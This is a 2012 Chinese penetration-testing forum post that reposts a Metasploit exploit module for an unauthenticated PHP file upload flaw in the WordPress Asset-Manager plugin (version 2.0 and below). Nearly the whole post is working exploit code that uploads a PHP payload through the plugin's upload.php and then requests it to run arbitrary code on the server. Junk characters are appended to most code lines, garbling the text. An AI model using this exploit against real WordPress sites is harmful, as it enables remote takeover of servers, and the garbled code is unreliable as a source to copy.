找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2969|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。9 f4 }$ k* L) b& C, V
3 \% {) @% s/ j' o( y) c8 V) g% K- W
##
# V3 F4 }1 Q, v1 v& \) s' u4 ~# This file is part of the Metasploit Framework and may be subject to
4 A( |( ~: y) E5 p- b# redistribution and commercial restrictions. Please see the Metasploit3 {- x. t# \3 z
# Framework web site for more information on licensing and terms of use.9 A! ?4 s7 Y/ j+ C
#   http://metasploit.com/framework/& ~$ T" h: G. @" p7 ~
### ^( \) `& _( L4 u( |( D5 n. Q

2 A7 o; E0 J8 n6 N3 r+ Z1 K  S: u) Wrequire 'msf/core'
* f$ T$ s6 y; j) F. v. I, D5 a' p, grequire 'msf/core/exploit/php_exe'
! Z2 f8 U. p. p
" ]6 B5 c- i  Y7 f/ G4 r6 e+ L: \class Metasploit3 < Msf::Exploit::Remote
+ q, _3 t% N  G$ u+ o  Rank = ExcellentRanking
7 G0 ^- o5 g/ ]: R1 a; p ) p, H: z7 b9 p& n$ I9 T  U
  include Msf::Exploit::Remote::HttpClient
+ U& U2 l4 l: k  include Msf::Exploit:hpEXE% R* D6 A8 f5 |( o

! E3 t: {; Q3 ~- n  F/ u4 w  def initialize(info = {})6 |" b) b1 @, f' O& B' D
    super(update_info(info,/ P# i/ @! j" r" N3 o- L
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',# i; `- `/ f4 w% E4 k
      'Description'    => %q{
7 m9 K7 {/ v, Z  l, ~: V: Z; G        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
7 P4 ]+ Y$ F7 {/ u6 f0 K" U; x        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
& k' M, y/ E0 O        temp directory without authentication, which results in arbitrary code execution.
6 Q9 @( B3 c/ ^4 j& ?3 \5 ]: z0 t+ _      },
& j3 O: C: I& z, u8 E$ N- s      'Author'         =>+ c) G+ W2 _& q% n, Z( V
        [
' D4 y" t, W+ Y. t/ o0 s          'Sammy FORGIT', # initial discovery
, K) f! _# V, A6 x6 i! H0 w          'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ J- u4 `6 i, f& v
        ],/ I( \* s7 W' |6 @9 F5 ]: Q
      'License'        => MSF_LICENSE,
, \9 [( D4 r. E/ r! e' j& b5 s      'References'     =>" `: G0 @; Y/ H9 C
        [
& d+ C  ?* H1 n: j" g          [ 'OSVDB', '82653' ],% A0 D" l8 m) l' T/ M* E8 P
          [ 'BID', '53809' ],
! P2 ?% w9 S( {4 [# q          [ 'EDB', '18993' ],% f* m% S0 f$ }5 C
          [ 'URL', 'http:// www.myhack58.com /' ]+ O, d) x1 `% ]+ F: ^
        ],7 S0 E3 Q. f# n. K) _
      'Payload'       =>! c( c& G, S' O) }: f! T
        {
2 @4 d. j' {$ s5 {          'BadChars' => "\x00",; s) N4 E8 @' }, Y+ v7 A
        },
$ E" r4 ^8 k2 P7 j9 D' J- b      'Platform'       => 'php',
6 t6 \# D3 h/ G0 L      'Arch'           => ARCH_PHP,) t6 F* J1 }& }$ i* Y9 c: _
      'Targets'        =>( M  a. h3 ?3 W# h! p
        [
6 j' `0 D* L6 ]+ c. b# Z1 k1 q          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ o% z; e+ O8 W5 k9 _* I3 d; o9 J
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
5 p9 g& F8 L$ a8 Q; m8 S2 A        ],
5 Q- {. n! ^2 ^8 b      'DefaultTarget' => 0,
# z( o- I! m1 Y- R2 ~+ n9 \      'DisclosureDate' => 'May 26 2012')); k! g! `0 v6 c' {4 a2 r

) ?' b+ y4 x9 o$ f    register_options($ F+ p9 c3 E6 L+ t
      [
( |- L# O6 s/ y3 B% G$ G        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])& ^6 l/ _5 P3 _3 f* k: Z
      ], self.class)% J3 s* x. q3 `2 G
  end% I1 [5 b7 r; v4 T
% K. T4 H$ R3 m* ~# ^
  def exploit
+ _) f' H. t7 p1 [  {2 v5 |2 c    uri =  target_uri.path
$ T, Q# Z! T" w# H- j    uri << '/' if uri[-1,1] != '/'
$ }/ g2 C" u3 {+ [/ \    peer = "#{rhost}:#{rport}"
" ~0 t* S# d' b0 ^) P! T    payload_name = "#{rand_text_alpha(5)}.php"2 j/ h; o' L  }- p+ d3 \
    php_payload = get_write_exec_payload(:unlink_self=>true)+ d; C! W& W; K8 f/ S
: i4 I) C+ K9 h- d! ?' p! d
    data = Rex::MIME::Message.new! M) u4 v* U  _+ ?
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""): m: x8 o9 y6 O* Z
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 U9 C3 C  Q# ]) [
- f& K2 ?. R1 L  u+ `" I- k    print_status("#{peer} - Uploading payload #{payload_name}")
4 r( ^, q/ |! z! {" g2 P8 d    res = send_request_cgi({
9 I: G: i& u3 B- j  T/ L( h( C6 e      'method'  => 'POST',
! e- i3 L! @- [% v1 ]8 Y      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
5 H4 m, e+ D8 j  x: w" E' r: m# n- T      'ctype'   => "multipart/form-data; boundary=#{data.bound}",. Q! Y* i! f$ E6 F& G  C
      'data'    => post_data
' S' u: n. u  T2 n& K7 Z    })7 [. u8 f6 U( t9 y# }. C( v
" `9 e$ y% s/ l0 g
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
2 b- z  ~5 J6 S* ~      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 j: w+ i6 w" n' Rend; z; K5 `9 b7 U: s
; a4 H" R5 V( E4 B
    print_status("#{peer} - Executing payload #{payload_name}"): O3 t/ V; T3 W1 `3 g9 |/ b, i
    res = send_request_raw({
! E. l' ?5 S# f/ Y      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
; {9 `4 x5 b% ?/ V      'method'  => 'GET'& P( y: O4 e2 p! B) l$ s
    })2 [& _" [  i: m5 j7 S! b& S7 m5 m
  p- t2 G4 s8 E1 I5 D: j
    if res and res.code != 200
, J6 P& r* x& `/ i0 H0 D      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
* X: U+ ^- u% _5 `6 a    end
7 G, g' T" Y5 M  J: l9 |! S0 Z  end
$ |6 F6 c9 `* ?end
' u2 d* W8 J) p6 W2 s
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表